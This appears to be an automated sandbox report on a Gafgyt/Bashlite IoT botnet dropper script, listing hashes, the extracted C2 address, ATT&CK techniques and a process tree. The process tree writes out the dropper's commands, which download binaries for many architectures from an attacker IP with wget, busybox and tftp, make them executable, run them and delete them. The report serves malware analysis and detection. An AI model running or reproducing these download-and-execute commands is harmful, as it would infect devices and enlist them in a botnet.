gafgyt | 8c27365e971954012e6a2543904fbbcea00241a369fd37f1dca5143e9f8c4d0e

Analysis

max time kernel
147s
max time network
148s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
06-12-2024 13:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.sh
Size

3KB
MD5

bd60ce22343af79a495628041c27c3a0
SHA1

a7510aabe4465db8de01ca2bc535003eddea0d37
SHA256

8c27365e971954012e6a2543904fbbcea00241a369fd37f1dca5143e9f8c4d0e
SHA512

1f5016541e9654176198e0e926fec6e51095697faec6397c69f05bbb5438ab5b3edcddcbfcbb4acaa44347396dd4f9b0a31577cfb1ca5240f95fc80e546d700b

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

185.91.127.27:87

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1552	chmod
1564	chmod
1576	chmod
1534	chmod
1526	chmod
1540	chmod
1546	chmod
1558	chmod
1570	chmod
1520	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/roze.mips	1521	roze.mips

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1515	busybox
1516	busybox
1522	rm
1524	busybox
1511	wget
1521	roze.mips
1523	wget
1525	busybox
1527	roze.mipsel
1528	rm

Writes file to tmp directory 32 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/roze.ppc	busybox
File opened for modification	/tmp/roze.ppc	wget
File opened for modification	/tmp/roze.mipsel	busybox
File opened for modification	/tmp/roze.sh4	busybox
File opened for modification	/tmp/roze.mips	wget
File opened for modification	/tmp/roze.ppc	busybox
File opened for modification	/tmp/roze.i586	wget
File opened for modification	/tmp/roze.m68k	wget
File opened for modification	/tmp/roze.i686	wget
File opened for modification	/tmp/roze.x86	busybox
File opened for modification	/tmp/roze.armv6	wget
File opened for modification	/tmp/roze.armv7	busybox
File opened for modification	/tmp/roze.m68k	busybox
File opened for modification	/tmp/roze.sh4	wget
File opened for modification	/tmp/roze.x86	busybox
File opened for modification	/tmp/roze.i586	busybox
File opened for modification	/tmp/roze.m68k	busybox
File opened for modification	/tmp/roze.sparc	wget
File opened for modification	/tmp/roze.sh4	busybox
File opened for modification	/tmp/roze.mipsel	wget
File opened for modification	/tmp/roze.x86	wget
File opened for modification	/tmp/roze.armv6	busybox
File opened for modification	/tmp/roze.armv7	wget
File opened for modification	/tmp/roze.sparc	busybox
File opened for modification	/tmp/roze.mips	busybox
File opened for modification	/tmp/roze.i686	busybox
File opened for modification	/tmp/roze.i586	busybox
File opened for modification	/tmp/roze.mipsel	busybox
File opened for modification	/tmp/roze.armv6	busybox
File opened for modification	/tmp/roze.i686	busybox
File opened for modification	/tmp/roze.sparc	busybox
File opened for modification	/tmp/roze.mips	busybox

/tmp/update.sh
/tmp/update.sh
1⤵
PID:1510
- /usr/bin/wget
  wget http://185.91.127.27/roze.mips -O roze.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1511
- /bin/busybox
  busybox wget http://185.91.127.27/roze.mips -O roze.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1515
- /bin/busybox
  busybox tftp -r roze.mips -g 185.91.127.27
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1516
- /bin/chmod
  chmod 777 roze.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/roze.mips
  ./roze.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1521
- /bin/rm
  rm -rf roze.mips
  2⤵
  - System Network Configuration Discovery
  PID:1522
- /usr/bin/wget
  wget http://185.91.127.27/roze.mipsel -O roze.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1523
- /bin/busybox
  busybox wget http://185.91.127.27/roze.mipsel -O roze.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1524
- /bin/busybox
  busybox tftp -r roze.mipsel -g 185.91.127.27
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1525
- /bin/chmod
  chmod 777 roze.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/roze.mipsel
  ./roze.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1527
- /bin/rm
  rm -rf roze.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1528
- /usr/bin/wget
  wget http://185.91.127.27/roze.sh4 -O roze.sh4
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/busybox
  busybox wget http://185.91.127.27/roze.sh4 -O roze.sh4
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/busybox
  busybox tftp -r roze.sh4 -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/chmod
  chmod 777 roze.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/roze.sh4
  ./roze.sh4
  2⤵
  PID:1535
- /bin/rm
  rm -rf roze.sh4
  2⤵
  PID:1536
- /usr/bin/wget
  wget http://185.91.127.27/roze.x86 -O roze.x86
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/busybox
  busybox wget http://185.91.127.27/roze.x86 -O roze.x86
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/busybox
  busybox tftp -r roze.x86 -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1539
- /bin/chmod
  chmod 777 roze.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /tmp/roze.x86
  ./roze.x86
  2⤵
  PID:1541
- /bin/rm
  rm -rf roze.x86
  2⤵
  PID:1542
- /usr/bin/wget
  wget http://185.91.127.27/roze.armv6 -O roze.armv6
  2⤵
  - Writes file to tmp directory
  PID:1543
- /bin/busybox
  busybox wget http://185.91.127.27/roze.armv6 -O roze.armv6
  2⤵
  - Writes file to tmp directory
  PID:1544
- /bin/busybox
  busybox tftp -r roze.armv6 -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1545
- /bin/chmod
  chmod 777 roze.armv6
  2⤵
  - File and Directory Permissions Modification
  PID:1546
- /tmp/roze.armv6
  ./roze.armv6
  2⤵
  PID:1547
- /bin/rm
  rm -rf roze.armv6
  2⤵
  PID:1548
- /usr/bin/wget
  wget http://185.91.127.27/roze.armv7 -O roze.armv7
  2⤵
  - Writes file to tmp directory
  PID:1549
- /bin/busybox
  busybox wget http://185.91.127.27/roze.armv7 -O roze.armv7
  2⤵
  PID:1550
- /bin/busybox
  busybox tftp -r roze.armv7 -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1551
- /bin/chmod
  chmod 777 roze.armv7
  2⤵
  - File and Directory Permissions Modification
  PID:1552
- /tmp/roze.armv7
  ./roze.armv7
  2⤵
  PID:1553
- /bin/rm
  rm -rf roze.armv7
  2⤵
  PID:1554
- /usr/bin/wget
  wget http://185.91.127.27/roze.i686 -O roze.i686
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/busybox
  busybox wget http://185.91.127.27/roze.i686 -O roze.i686
  2⤵
  - Writes file to tmp directory
  PID:1556
- /bin/busybox
  busybox tftp -r roze.i686 -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1557
- /bin/chmod
  chmod 777 roze.i686
  2⤵
  - File and Directory Permissions Modification
  PID:1558
- /tmp/roze.i686
  ./roze.i686
  2⤵
  PID:1559
- /bin/rm
  rm -rf roze.i686
  2⤵
  PID:1560
- /usr/bin/wget
  wget http://185.91.127.27/roze.ppc -O roze.ppc
  2⤵
  - Writes file to tmp directory
  PID:1561
- /bin/busybox
  busybox wget http://185.91.127.27/roze.ppc -O roze.ppc
  2⤵
  - Writes file to tmp directory
  PID:1562
- /bin/busybox
  busybox tftp -r roze.ppc -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1563
- /bin/chmod
  chmod 777 roze.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1564
- /tmp/roze.ppc
  ./roze.ppc
  2⤵
  PID:1565
- /bin/rm
  rm -rf roze.ppc
  2⤵
  PID:1566
- /usr/bin/wget
  wget http://185.91.127.27/roze.i586 -O roze.i586
  2⤵
  - Writes file to tmp directory
  PID:1567
- /bin/busybox
  busybox wget http://185.91.127.27/roze.i586 -O roze.i586
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/busybox
  busybox tftp -r roze.i586 -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1569
- /bin/chmod
  chmod 777 roze.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1570
- /tmp/roze.i586
  ./roze.i586
  2⤵
  PID:1571
- /bin/rm
  rm -rf roze.i586
  2⤵
  PID:1572
- /usr/bin/wget
  wget http://185.91.127.27/roze.m68k -O roze.m68k
  2⤵
  - Writes file to tmp directory
  PID:1573
- /bin/busybox
  busybox wget http://185.91.127.27/roze.m68k -O roze.m68k
  2⤵
  - Writes file to tmp directory
  PID:1574
- /bin/busybox
  busybox tftp -r roze.m68k -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1575
- /bin/chmod
  chmod 777 roze.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1576
- /tmp/roze.m68k
  ./roze.m68k
  2⤵
  PID:1577
- /bin/rm
  rm -rf roze.m68k
  2⤵
  PID:1578
- /usr/bin/wget
  wget http://185.91.127.27/roze.sparc -O roze.sparc
  2⤵
  - Writes file to tmp directory
  PID:1579
- /bin/busybox
  busybox wget http://185.91.127.27/roze.sparc -O roze.sparc
  2⤵
  - Writes file to tmp directory
  PID:1580
- /bin/busybox
  busybox tftp -r roze.sparc -g 185.91.127.27
  2⤵
  - Writes file to tmp directory
  PID:1581

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/roze.mips

Filesize
209KB

MD5
97d9d4346609a36db70c4732d53f530a

SHA1
a9beb573471c7a6d83dc70fa331233446f49556c

SHA256
79164326a7940f25869476593db103dfd144e7155d7f005e3f51d4f5472df840

SHA512
160deab9e2ebf460fbf264b71737a5dc509c03a61e1b75324582b6644eb3f9dec2b83ff9add8ae5ccec83910c04f1a1b4b93d22ba6c1d46d54f6d82623a1c73c

Download Submit